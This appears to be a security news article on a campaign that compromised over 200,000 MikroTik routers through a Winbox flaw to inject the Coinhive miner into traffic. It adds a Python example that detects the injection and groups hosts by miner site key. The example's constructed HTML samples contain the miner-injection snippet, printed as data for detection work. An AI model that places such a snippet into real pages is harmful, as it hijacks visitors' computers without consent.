The attacks were at first concentrated in Brazil but then spread to other countries, which is what drew the attention of Trustwave. According to the company's analysts, as of August 1, 2018, unknown attackers had compromised more than 72,000 MikroTik routers in Brazil alone.
At that time only one group was carrying out such attacks, since the researchers managed to identify just one Coinhive site key.
The researchers write that the attackers are exploiting the vulnerability discovered in the Winbox component in April of this year. Although MikroTik engineers quickly patched this dangerous bug, router owners are unfortunately in no hurry to install the update, so devices reachable from the Internet remain exploitable. Meanwhile, PoC exploits (1, 2) and detailed analyses of the vulnerability have already been published.
After compromise, the devices are used to tamper with traffic: the routers are forced to inject the Coinhive mining script into every page of every site passing through them. Worse, according to the experts, the attacks affected not only users of MikroTik devices. Some Brazilian ISPs use the vulnerable routers in their core networks, so their compromise meant Coinhive injections hit a large share of all traffic. Nor are such injections dangerous only for end users: if, for example, a site is hosted on a local network behind a MikroTik router, its outgoing traffic is also infected with the Coinhive miner.
The attackers soon realized, however, that injecting the miner into literally every page is a poor idea, since this behaviour attracts too much attention. The operators of the campaign then limited themselves to the error pages returned by the routers. The scale of the attack has not diminished: after the campaign spread beyond Brazil, the number of routers infected with Coinhive exceeded 180,000.
A simple Shodan search shows that over 1.7 million MikroTik routers are exposed on the Internet, so the attackers certainly have room to expand. Bleeping Computer reports that, according to the well-known information security expert Troy Mursch, a second Coinhive site key injected into the traffic of MikroTik devices has been identified. This second campaign affected at least 25,000 routers, bringing the total number of compromised devices to more than 200,000.
Coinhive site key “oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4” is used in another #cryptojacking campaign targeting MikroTik routers. In this case, over 25,000 affected hosts are found on @censysio
h/t @onyphe https://t.co/M9iLatsIVX
– Bad Packets Report (@bad_packets) August 2, 2018
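As an added example (not code from the article, from Trustwave or from Bad Packets), the Python below shows how the injection described above can be recognised in HTTP response bodies and how the Coinhive site key, the identifier that lets researchers tell one campaign from another, is extracted and grouped by host. The sample responses are constructed for illustration: the key in the error-page sample is the one quoted in the tweet above, the other key is made up, and the host names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample HTTP response bodies (not captured from real traffic).
# The injection pattern used by the campaign: a <script> loading coinhive.min.js
# followed by a miner started with a site key.
FAKE_KEY = "ExampleKey" + "0" * 22   # 32-character made-up key for illustration
PAGE_KEY = "oDcuakJy9iKIQhnaZRpy9tEsYiF2PUx4"   # key quoted in the Bad Packets tweet

SAMPLE_CLEAN_PAGE = "<html><head><title>Shop</title></head><body>Welcome</body></html>"

SAMPLE_INJECTED_PAGE = (
    "<html><head><title>News</title>\n"
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
    "<script>\n"
    "var miner = new CoinHive.Anonymous('" + FAKE_KEY + "');\n"
    "miner.start();\n"
    "</script>\n"
    "</head><body>Article text</body></html>"
)

# Later phase of the campaign: only router error pages carry the miner.
SAMPLE_ERROR_PAGE = (
    "<html><head><title>Error</title>\n"
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
    '<script>var m = new CoinHive.User("' + PAGE_KEY + '", "x"); m.start();</script>\n'
    "</head><body><h1>404 Not Found</h1></body></html>"
)

# The library loader may be served from the router itself instead of coinhive.com,
# so the site key in the constructor call is the more robust indicator.
COINHIVE_LOADER = re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.IGNORECASE)
# Coinhive site keys are 32 alphanumeric characters and are the first argument of
# CoinHive.Anonymous(...) or CoinHive.User(...).
SITE_KEY = re.compile(r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9]{32})['\"]")


def find_coinhive_keys(body):
    """Return the list of Coinhive site keys found in one HTTP response body."""
    return SITE_KEY.findall(body)


def is_injected(body):
    """True when the body loads the Coinhive library or starts a Coinhive miner."""
    return bool(COINHIVE_LOADER.search(body) or SITE_KEY.search(body))


def hosts_by_key(responses):
    """Group responding hosts by site key.

    responses: iterable of (host, body). Hosts sharing one key belong to one
    campaign; a new key appearing across many hosts points to a second operator.
    """
    groups = defaultdict(set)
    for host, body in responses:
        for key in find_coinhive_keys(body):
            groups[key].add(host)
    return {key: sorted(hosts) for key, hosts in groups.items()}


if __name__ == "__main__":
    # Hypothetical hosts, as a scan of router error pages might return them.
    scan = [
        ("router-a.example", SAMPLE_ERROR_PAGE),
        ("router-b.example", SAMPLE_ERROR_PAGE),
        ("router-c.example", SAMPLE_INJECTED_PAGE),
        ("clean.example", SAMPLE_CLEAN_PAGE),
    ]
    for key, hosts in hosts_by_key(scan).items():
        print(key, len(hosts), "hosts")
```

When run against real scan data, the per-key host counts are what turn a pile of infected pages into a count of distinct campaigns, which is how the second key in the tweet was recognised as a separate operation rather than growth of the first.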